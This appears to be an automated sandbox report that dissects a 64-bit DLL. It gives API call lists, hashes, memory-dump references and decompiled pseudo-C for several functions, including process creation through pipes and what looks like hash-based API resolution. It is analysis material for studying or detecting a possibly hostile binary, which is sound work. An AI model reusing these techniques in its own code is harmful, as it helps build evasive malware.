TerminateProcess.KERNEL32 ref: 0000000180006844
CloseHandle.KERNEL32 ref: 000000018000684F
CloseHandle.KERNEL32 ref: 000000018000685A
GetLastError.KERNEL32 ref: 0000000180006862
HeapFree.KERNEL32 ref: 0000000180006877

Strings

h, xrefs: 00000001800067A1

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: CloseHandleHeapProcess$AllocCreateErrorFreeLastMultipleObjectsTerminateWaitmemset
String ID: h
API String ID: 3316326719-2439710439
Opcode ID: fb432cae3a15b5eaa338603b7acd1f3494cf9eca908a212787e2a653c3defb75
Instruction ID: 097b2738b8004f5ee40f8b7a1758c839ecbf0a38091e65ea8e5fbb9dadc2f9be
Opcode Fuzzy Hash: fb432cae3a15b5eaa338603b7acd1f3494cf9eca908a212787e2a653c3defb75
Instruction Fuzzy Hash: CF318E32704B8986EB95CB56E84479AB3A1F78CBD0F14C135EA9D83B64DF78C548CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000970C Relevance: 15.2, APIs: 12, Instructions: 177
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E0000000118000970C(void* __ebx, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9, signed long long __r11) {
				void* __rdi;
				signed int _t56;
				int _t61;
				intOrPtr _t77;
				intOrPtr _t78;
				struct _CRITICAL_SECTION* _t121;
				long long _t124;
				intOrPtr* _t150;
				struct _CRITICAL_SECTION* _t154;
				long long _t161;
				intOrPtr* _t162;
				void* _t165;
				void* _t166;
				void* _t168;
				signed long long _t177;
				struct _CRITICAL_SECTION* _t179;
				struct _CRITICAL_SECTION* _t183;
				void* _t186;
				void* _t189;
				void* _t190;

				_t177 = __r11;
				_t168 = __r8;
				_t126 = __rbx;
				 *((long long*)(_t165 + 0x10)) = __rbx;
				 *((long long*)(_t165 + 0x18)) = _t161;
				 *((long long*)(_t165 + 0x20)) = __rsi;
				_t166 = _t165 - 0x60;
				_t159 =  *__rcx;
				r14d = r8d;
				_t190 = __rdx;
				_t162 = __rcx;
				 *((long long*)(_t166 + 0x58)) =  *__rcx;
				if ( *((intOrPtr*)(__rcx + 0x70)) -  *((intOrPtr*)(__rcx + 0x50)) < 0) goto 0x80009758;
				E000000011800045E8(__ebx,  *0x8000d4a0, __rbx, __rcx,  *__rcx, __rcx, _t189, _t186);
				EnterCriticalSection(_t183);
				asm("lock add dword [esi+0x40], 0x1");
				LeaveCriticalSection(_t179);
				r11d =  *(_t162 + 0x70) & 0x000000ff;
				_t56 =  *(_t162 + 0x50) & 0x000000ff;
				if (r11d - _t56 >= 0) goto 0x800097e8;
				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t162 + 0x48)) + _t177 * 8));
				_t77 =  *_t150;
				if (_t77 == dil) goto 0x800097aa;
				if (_t77 == 0x2f) goto 0x800097a5;
				_t78 =  *((intOrPtr*)(_t150 + 1));
				if (_t78 != dil) goto 0x80009796;
				if (_t78 != dil) goto 0x800097ad;
				_t121 = _t154;
				if (_t121 == _t154) goto 0x800097c5;
				if ( *((char*)(_t121 - 1)) != 0x3a) goto 0x800097c5;
				if ( *((char*)(_t121 + 1)) != 0x2f) goto 0x800097c5;
				E00000001180001C00(0, _t126, _t177 + _t150, _t154, _t159, _t162);
				if (_t121 == _t154) goto 0x800097e8;
				 *(_t166 + 0x90) = 0 | _t56 + 0x00000002 == 0x00000008;
				asm("lock add dword [esi+0x40], 0xffffffff");
				if (_t121 == _t154) goto 0x8000996c;
				r9d = 0;
				r8d = r14d;
				 *((long long*)(_t166 + 0x38)) = _t166 + 0x40;
				 *((long long*)(_t166 + 0x30)) = _t166 + 0x48;
				_t24 = _t166 + 0x50; // 0x32
				_t124 = _t24;
				 *((long long*)(_t166 + 0x28)) = _t124;
				 *((intOrPtr*)(_t166 + 0x20)) = 0;
				if (E00000001180006108(_t126, _t162, _t190, _t168) != 0) goto 0x8000995c;
				_t187 =  *_t162;
				EnterCriticalSection(_t154);
				asm("lock inc ecx");
				LeaveCriticalSection(??);
				if ( *((intOrPtr*)(_t162 + 0x18)) == _t154) goto 0x8000986b;
				E00000001180001C00(0, _t126,  *((intOrPtr*)(_t162 + 0x18)), _t154, _t159, _t162);
				goto 0x80009873;
				asm("lock inc ecx");
				if ( *(_t166 + 0x90) == _t154) goto 0x8000993c;
				r14d = lstrlenA(??);
				_t61 = lstrlenA(??);
				_t32 = _t187 + 2; // 0x2
				r15d = _t61;
				E00000001180001C00(_t124 + _t32,  *(_t166 + 0x90), _t121, _t154, _t159, _t162);
				if (_t124 == _t154) goto 0x8000992e;
				_t33 = _t190 + 1; // 0x1
				r8d = _t33;
				 *((char*)( *_t162 + _t124)) = 0x2f;
				memcpy(??, ??, ??);
				dil =  *(_t166 + 0x90) != 0;
				 *((intOrPtr*)(_t166 + 0x38)) = 2;
				 *((long long*)(_t166 + 0x30)) =  *((intOrPtr*)(_t166 + 0xb8));
				 *((long long*)(_t166 + 0x28)) =  *((intOrPtr*)(_t166 + 0xb0));
				 *((intOrPtr*)(_t166 + 0x20)) =  *((intOrPtr*)(_t166 + 0x40));
				if (E000000011800088B4(_t56 + 2,  *(_t166 + 0x90),  *((intOrPtr*)(_t166 + 0x58)), _t124,  *((intOrPtr*)(_t166 + 0xb0)), _t159, _t124,  *((intOrPtr*)(_t166 + 0x50)),  *((intOrPtr*)(_t166 + 0x48))) != 0x10d2) goto 0x80009920;
				asm("sbb eax, eax");
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				goto 0x80009971;
				return 8;
			}

0x18000970c
0x18000970c
0x18000970c
0x18000970c
0x180009711
0x180009716
0x180009724
0x18000972f
0x18000973b
0x18000973e
0x180009741
0x180009744
0x18000974f
0x180009753
0x18000975c
0x180009762
0x18000976b
0x180009771
0x180009776
0x18000977d
0x180009788
0x18000978f
0x180009794
0x180009799
0x18000979e
0x1800097a3
0x1800097a8
0x1800097aa
0x1800097b0
0x1800097b6
0x1800097bc
0x1800097cc
0x1800097d7
0x1800097e1
0x1800097e8
0x1800097f0
0x1800097fb
0x1800097fe
0x180009801
0x18000980e
0x180009813
0x180009813
0x18000981b
0x180009820
0x18000982d
0x180009833
0x180009840
0x180009846
0x180009850
0x18000985d
0x180009861
0x180009869
0x180009873
0x18000987c
0x18000988e
0x180009891
0x18000989a
0x18000989f
0x1800098a2
0x1800098ad
0x1800098af
0x1800098af
0x1800098bb
0x1800098c0
0x1800098e3
0x1800098ed
0x1800098f9
0x180009902
0x180009907
0x180009917
0x18000991c
0x180009928
0x180009936
0x180009946
0x180009956
0x180009964
0x18000996a
0x180009990

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,0000000180005069), ref: 000000018000975C
LeaveCriticalSection.KERNEL32(?,0000000180005069), ref: 000000018000976B
EnterCriticalSection.KERNEL32(?,0000000180005069), ref: 0000000180009840
LeaveCriticalSection.KERNEL32(?,0000000180005069), ref: 0000000180009850
lstrlenA.KERNEL32(?,0000000180005069), ref: 0000000180009885
lstrlenA.KERNEL32(?,0000000180005069), ref: 0000000180009891
memcpy.NTDLL(?,0000000180005069), ref: 00000001800098C0

Part of subcall function 00000001800045E8: GetSystemTimeAsFileTime.KERNEL32 ref: 000000018000461B
Part of subcall function 00000001800045E8: LeaveCriticalSection.KERNEL32 ref: 0000000180004653

Part of subcall function 00000001800088B4: memset.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0000000180009910,?,0000000180005069), ref: 00000001800088F9

HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009928
HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009936
HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009946
HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009956
HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009964

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: CriticalFreeHeapSection$Leave$EnterTimelstrlen$FileSystemmemcpymemset
String ID:
API String ID: 4119546182-0
Opcode ID: 2ad9a0bc2d8bc88a4eb816e4b8ea3e44bf3c6b6e7dae9fa03fc2860de6b20740
Instruction ID: 44ed652dd4a090d7685ee9479cd2374acead57c43adb5283d017da8f701a6da5
Opcode Fuzzy Hash: 2ad9a0bc2d8bc88a4eb816e4b8ea3e44bf3c6b6e7dae9fa03fc2860de6b20740
Instruction Fuzzy Hash: F5719436608A8886EBA1CF66E8043DAB7A1F78CBD0F458125FE9D83755DF38C649C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002F24 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 112memorypipeCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 0000000180002F58
memset.NTDLL ref: 0000000180002F7E
CreatePipe.KERNEL32 ref: 0000000180002FB4
GetLastError.KERNEL32 ref: 0000000180002FBE

Strings

.RK, xrefs: 000000018000304E

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: AllocCreateErrorHeapLastPipememset
String ID: .RK
API String ID: 2695650488-3354657194
Opcode ID: 3abbf9810bb3c5e620b32a2dd9f1b3a1cda1bf4db2d5332f5b3a00b2673bdb8e
Instruction ID: 378f6602c2b1250aa9488984ecc26cdba5ebabec116acb0dc11713ee51ebb5a5
Opcode Fuzzy Hash: 3abbf9810bb3c5e620b32a2dd9f1b3a1cda1bf4db2d5332f5b3a00b2673bdb8e
Instruction Fuzzy Hash: 4E41AD71314B8982EB93CB66E4613E977A4FB8CBC4F048021EA4987B95DF38D64CCB01

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005600 Relevance: 10.6, APIs: 7, Instructions: 81memorystringtimeCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32 ref: 0000000180005634
HeapAlloc.KERNEL32 ref: 0000000180005648
GetSystemTime.KERNEL32 ref: 000000018000565F
_snprintf.NTDLL ref: 00000001800056B6
EnterCriticalSection.KERNEL32 ref: 00000001800056C2
LeaveCriticalSection.KERNEL32 ref: 000000018000571B
HeapFree.KERNEL32 ref: 0000000180005729

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterFreeLeaveSystemTime_snprintflstrlen
String ID:
API String ID: 2518601019-0
Opcode ID: 6bbdaee708397e269f1719576e0b408813d3eaae43c78365dabaa5161097e835
Instruction ID: d9d6c815191b5ef41651c0c787a8a8ca67448b671f5da5a3966f0d0395a17d9c
Opcode Fuzzy Hash: 6bbdaee708397e269f1719576e0b408813d3eaae43c78365dabaa5161097e835
Instruction Fuzzy Hash: C9313B36208B8486D795CF12F8447AAB761F789BD5F448026EE8A43B24EF3CD549CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001000 Relevance: 10.6, APIs: 7, Instructions: 79memoryfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 000000018000104A
GetFileSize.KERNEL32 ref: 000000018000105E
HeapAlloc.KERNEL32 ref: 000000018000107A
ReadFile.KERNEL32 ref: 000000018000109F
GetLastError.KERNEL32 ref: 00000001800010C8
CloseHandle.KERNEL32 ref: 00000001800010D9
HeapFree.KERNEL32 ref: 00000001800010F0

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: File$Heap$AllocCloseCreateErrorFreeHandleLastReadSize
String ID:
API String ID: 4260168601-0
Opcode ID: 95c6153764ce9edb243c7aab14e288f80f1312c95db6219c76ea6eb6d084c666
Instruction ID: dbc3ca4fbdf92ddb3d6ab0fb3fd3743db26333d8f93616b96f69221312f2bdc0
Opcode Fuzzy Hash: 95c6153764ce9edb243c7aab14e288f80f1312c95db6219c76ea6eb6d084c666
Instruction Fuzzy Hash: 3431413120478986F7A2CB56A8447DAB6D0B74CBE5F44C325EEA9477D4DF78C68E8B00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001D98 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75processmemoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0000000180001DD1

Part of subcall function 00000001800089E4: HeapAlloc.KERNEL32(?,?,?,0000000180006E17,?,?,?,?,00000000,00000001800052B1), ref: 0000000180008A5D

memcpy.NTDLL ref: 0000000180001E66
CreateProcessW.KERNEL32 ref: 0000000180001EA4
GetLastError.KERNEL32 ref: 0000000180001EAE
HeapFree.KERNEL32 ref: 0000000180001EBE

Strings

h, xrefs: 0000000180001E1C

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: Heap$AllocCreateErrorFreeLastProcessmemcpymemset
String ID: h
API String ID: 1962595928-2439710439
Opcode ID: 598079d7ebde3786078e4e8496c9395ee778a1e9a6aa669798a3687931c5e084
Instruction ID: 4743b7abae4fc84edbe905cfc6942fba1d9a030ece9545f382f76fd41ef8ffd2
Opcode Fuzzy Hash: 598079d7ebde3786078e4e8496c9395ee778a1e9a6aa669798a3687931c5e084
Instruction Fuzzy Hash: 5E312F32204A89DAE7A1DF16F8447CAB7A4F7887D4F458125EA8D83B54DF78C64ACB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007A7C Relevance: 10.5, APIs: 7, Instructions: 34COMMON

Download Yara Rule

APIs

TerminateProcess.KERNEL32 ref: 0000000180007A9F
CloseHandle.KERNEL32 ref: 0000000180007AA9
CloseHandle.KERNEL32 ref: 0000000180007AB3
CloseHandle.KERNEL32 ref: 0000000180007AC2
CloseHandle.KERNEL32 ref: 0000000180007ACC
CloseHandle.KERNEL32 ref: 0000000180007ADB
CloseHandle.KERNEL32 ref: 0000000180007AE5

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: CloseHandle$ProcessTerminate
String ID:
API String ID: 1541851893-0
Opcode ID: 87714ba418a4876f44f41e607543c34b556ed111d7d5074f5947d895b051b476
Instruction ID: 6aea6e80272aa285d695e7919669a58fbc0d4d182d54ab24a0e74719d0bdf862
Opcode Fuzzy Hash: 87714ba418a4876f44f41e607543c34b556ed111d7d5074f5947d895b051b476
Instruction Fuzzy Hash: 27017D35701A49C1EB96DF66D8547A97361FB8CFD5F05C021AE1E82725DE28C64DC701

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800020DC Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 138
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E000000011800020DC(long long* __rax, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rsi) {
				intOrPtr _t43;
				intOrPtr _t44;
				signed int _t45;
				long long* _t81;
				void* _t82;
				void* _t83;
				long long* _t84;
				void* _t104;
				long long _t108;
				void* _t111;
				void* _t112;
				void* _t121;
				int _t123;
				int _t126;
				void* _t129;
				CHAR* _t131;

				_t81 = __rax;
				 *((long long*)(_t111 + 8)) = __rbx;
				 *((long long*)(_t111 + 0x18)) = _t108;
				 *((long long*)(_t111 + 0x20)) = __rsi;
				_t112 = _t111 - 0x1c0;
				_t109 =  *0x8000d4a0;
				r14d = 0;
				 *(_t112 + 0x1f8) = lstrlenA(_t131);
				memset(_t129, _t126, _t123);
				_t6 = _t104 + 1; // 0x1
				_t7 = _t129 + 2; // 0x2
				r11d = _t7;
				r8d = _t6;
				 *__rdx = r11w;
				HeapAlloc(_t104, ??);
				if (__rax == 0) goto 0x80002287;
				memcpy(??, ??, ??);
				_t43 =  *((intOrPtr*)(__rax));
				if (_t43 == dil) goto 0x80002192;
				if (_t43 == 0x3a) goto 0x8000218d;
				_t44 =  *((intOrPtr*)(__rax + 1));
				if (_t44 != dil) goto 0x8000217d;
				if (_t44 != dil) goto 0x80002195;
				_t121 = _t104;
				if (_t121 == _t104) goto 0x800021d9;
				_t8 = _t121 + 1; // 0x1
				 *_t121 = dil;
				if (_t8 == _t104) goto 0x800021d9;
				if (E000000011800038F8(_t8, __rcx, _t112 + 0x1f8) == 0) goto 0x80002279;
				_t45 =  *(_t112 + 0x1f8) & 0x0000ffff;
				asm("ror cx, 0x8");
				 *(__rdx + 2) = _t45;
				if (_t45 == 0) goto 0x80002279;
				E0000000118000459C(0x25fff021, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
				if (_t81 == _t104) goto 0x800021f5;
				 *_t81();
				goto 0x800021f8;
				_t82 = _t104;
				if (_t82 != _t104) goto 0x8000224d;
				E0000000118000459C(0xb27f4910, _t82,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
				if (_t82 == _t104) goto 0x8000221e;
				 *_t82();
				goto 0x80002220;
				if (0 != 0) goto 0x80002249;
				r14d = 1;
				E0000000118000459C(0x25fff021, _t82,  *((intOrPtr*)(_t109 + 0x30)));
				if (_t82 == _t104) goto 0x80002241;
				 *_t82();
				goto 0x80002244;
				_t83 = _t104;
				if (_t83 != _t104) goto 0x8000224d;
				goto 0x8000225f;
				_t84 =  *((intOrPtr*)(_t83 + 0x18));
				 *((intOrPtr*)(__rdx + 4)) =  *((intOrPtr*)( *_t84));
				if (r14d == 0) goto 0x80002279;
				E0000000118000459C(0x9cb92d3f, _t84,  *((intOrPtr*)(_t109 + 0x30)));
				if (_t84 == _t104) goto 0x80002279;
				 *_t84();
				HeapFree(??, ??, ??);
				return 1;
			}

0x1800020dc
0x1800020dc
0x1800020e1
0x1800020e6
0x1800020f4
0x1800020fb
0x180002112
0x180002122
0x180002136
0x18000213b
0x18000213e
0x18000213e
0x180002142
0x18000214a
0x180002151
0x18000215d
0x18000216c
0x180002171
0x18000217b
0x180002180
0x180002185
0x18000218b
0x180002190
0x180002192
0x180002198
0x18000219a
0x18000219e
0x1800021a4
0x1800021b9
0x1800021bf
0x1800021c7
0x1800021cb
0x1800021d3
0x1800021e4
0x1800021ec
0x1800021f1
0x1800021f3
0x1800021f5
0x1800021fb
0x180002206
0x18000220e
0x18000221a
0x18000221c
0x180002222
0x18000222a
0x180002230
0x180002238
0x18000223d
0x18000223f
0x180002241
0x180002247
0x18000224b
0x18000224d
0x18000225b
0x180002262
0x18000226d
0x180002275
0x180002277
0x180002281
0x1800022a9

APIs

lstrlenA.KERNEL32 ref: 0000000180002117
memset.NTDLL ref: 0000000180002136
HeapAlloc.KERNEL32 ref: 0000000180002151
memcpy.NTDLL ref: 000000018000216C
HeapFree.KERNEL32 ref: 0000000180002281

Strings

lJu, xrefs: 0000000180002129

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: Heap$AllocFreelstrlenmemcpymemset
String ID: lJu
API String ID: 1735321128-4100297759
Opcode ID: d5c37469df4fda8eac190539a58a31bd497cd0413708541462a44a7583b64b03
Instruction ID: f04020e7afacaa342a0f02f17fd00bf906b29f7f5bb121ef27d08f96d68cd7ee
Opcode Fuzzy Hash: d5c37469df4fda8eac190539a58a31bd497cd0413708541462a44a7583b64b03
Instruction Fuzzy Hash: D7510C32304A9C96EAE3DBA299143EA7792F78CBC4F59C021FE5947755DD39CE898300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005DF8 Relevance: 9.1, APIs: 6, Instructions: 131
memoryCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00000001180005DF8(long long __rbx, intOrPtr* __rcx, void* __r8) {
				signed long long _t88;
				long _t111;
				void* _t114;
				long _t117;
				void* _t121;
				void* _t122;
				long _t130;
				void* _t133;

				 *((long long*)(_t121 + 0x18)) = __rbx;
				_t122 = _t121 - 0x30;
				_t88 =  *0x8000d4a0;
				r13d = 0;
				 *(__rcx + 0x5c) = r13d;
				 *(_t122 + 0x68) = r13d;
				if ( *((intOrPtr*)(__rcx + 0x58)) != r13d) goto 0x80005fbc;
				 *(_t122 + 0x60) = 4;
				E0000000118000459C(0x5431d47a, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
				if (_t88 == _t133) goto 0x80005e56;
				 *_t88();
				goto 0x80005e59;
				if (r13d == r13d) goto 0x80005fb4;
				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
				if (_t88 == _t133) goto 0x80005e9d;
				_t10 = _t122 + 0x68; // 0xa
				r8d = 0;
				 *((long long*)(_t122 + 0x28)) = _t10;
				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
				 *_t88();
				goto 0x80005ea0;
				if (r13d == r13d) goto 0x80005fb4;
				 *(_t122 + 0x68) = r13d;
				 *(_t122 + 0x60) = r13d;
				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
				if (_t88 == _t133) goto 0x80005eea;
				_t19 = _t122 + 0x68; // 0xa
				r9d = 0;
				r8d = 0;
				 *((long long*)(_t122 + 0x28)) = _t19;
				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
				 *_t88();
				r8d =  *(_t122 + 0x60);
				HeapAlloc(_t133, _t130, _t111);
				if (_t88 == _t133) goto 0x80005fad;
				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
				if (_t88 == _t133) goto 0x80005f43;
				_t27 = _t122 + 0x68; // 0xa
				r8d = 0;
				 *((long long*)(_t122 + 0x28)) = _t27;
				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
				 *_t88();
				goto 0x80005f46;
				if (r13d == r13d) goto 0x80005f95;
				 *(_t122 + 0x60) =  *(_t122 + 0x60) >> 1;
				 *((intOrPtr*)(_t88 + _t88 * 2)) = r13w;
				r8d =  *(_t122 + 0x60);
				HeapAlloc(_t114, _t117);
				if (_t88 == _t133) goto 0x80005f8e;
				r8d =  *(_t122 + 0x60);
				r8d = r8d + 1;
				wcstombs(??, ??, ??);
				 *(__rcx + 0x20) = _t88;
				goto 0x80005f9d;
				goto 0x80005f9d;
				GetLastError();
				HeapFree(??, ??, ??);
				goto 0x80005fbc;
				goto 0x80005fbc;
				return GetLastError();
			}

0x180005df8
0x180005e04
0x180005e08
0x180005e19
0x180005e1f
0x180005e23
0x180005e2b
0x180005e31
0x180005e42
0x180005e4a
0x180005e52
0x180005e54
0x180005e5c
0x180005e6b
0x180005e73
0x180005e75
0x180005e7e
0x180005e81
0x180005e90
0x180005e99
0x180005e9b
0x180005ea3
0x180005ea9
0x180005eae
0x180005ebc
0x180005ec4
0x180005ec6
0x180005ecb
0x180005ece
0x180005ed1
0x180005edf
0x180005ee8
0x180005eea
0x180005ef8
0x180005f04
0x180005f13
0x180005f1b
0x180005f1d
0x180005f22
0x180005f28
0x180005f36
0x180005f3f
0x180005f41
0x180005f49
0x180005f56
0x180005f5a
0x180005f5f
0x180005f67
0x180005f73
0x180005f75
0x180005f80
0x180005f83
0x180005f88
0x180005f8c
0x180005f93
0x180005f95
0x180005fa5
0x180005fab
0x180005fb2
0x180005fce

APIs

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

HeapAlloc.KERNEL32 ref: 0000000180005EF8
HeapAlloc.KERNEL32 ref: 0000000180005F67
wcstombs.NTDLL ref: 0000000180005F83
HeapFree.KERNEL32 ref: 0000000180005FA5

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: Heap$Alloc$ErrorFreeLastwcstombs
String ID:
API String ID: 4133724704-0
Opcode ID: 153f03945acc7980eafc6a68c3935249d809b24ea8f0d96ec6fa36ed55d54185
Instruction ID: a4f29d9b70dc603b3f8cc85abbd9ea91cf1cef2a8837b32e5229c32126143bc8
Opcode Fuzzy Hash: 153f03945acc7980eafc6a68c3935249d809b24ea8f0d96ec6fa36ed55d54185
Instruction Fuzzy Hash: 3F515A36204A8887E7A1DB52E4403AF7761F78C7C9F548521BA8D87B54DF38D65D8B00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003FCC Relevance: 9.1, APIs: 6, Instructions: 125
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 18%

			E00000001180003FCC(intOrPtr* __rcx) {
				void* __rbx;
				void* __rbp;
				long long* _t84;
				long long* _t85;
				void* _t87;
				intOrPtr* _t106;
				void* _t109;

				_t84 =  *0x8000d4a0;
				_t106 = __rcx;
				 *(_t109 + 0x58) =  *(_t109 + 0x58) & 0;
				E0000000118000459C(0x3a7e805d, _t84,  *((intOrPtr*)( *__rcx + 0x50)));
				if (_t84 == 0) goto 0x8000400e;
				 *_t84();
				goto 0x80004010;
				if (0 == 0) goto 0x80004151;
				if ( *((intOrPtr*)(_t109 + 0x50)) == 0) goto 0x8000414c;
				 *0x8000d028();
				if (0 != 0) goto 0x80004145;
				r8d = 0x1000;
				HeapAlloc(??, ??, ??);
				if (_t84 == 0) goto 0x80004133;
				E0000000118000459C(0x3cd8e449, _t84,  *((intOrPtr*)( *__rcx + 0x50)));
				if (_t84 == 0) goto 0x8000408d;
				r8d = 0x1000;
				r8d =  <  ?  *((void*)(_t109 + 0x50)) : r8d;
				 *_t84();
				goto 0x8000408f;
				if (0 == 0) goto 0x800040b7;
				r8d =  *(_t109 + 0x58);
				r9d = 0;
				_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x60))));
				 *((intOrPtr*)(_t85 + 0x20))();
				r11d =  *(_t109 + 0x58);
				 *((intOrPtr*)(_t109 + 0x50)) =  *((intOrPtr*)(_t109 + 0x50)) - r11d;
				if (0 == 0) goto 0x800040bf;
				goto 0x80004059;
				GetLastError();
				if (WaitForSingleObject(??, ??) == 0) goto 0x8000410b;
				E0000000118000459C(0x3a7e805d, _t85,  *((intOrPtr*)( *__rcx + 0x50)));
				if (_t85 == 0) goto 0x800040ef;
				 *_t85();
				goto 0x800040f1;
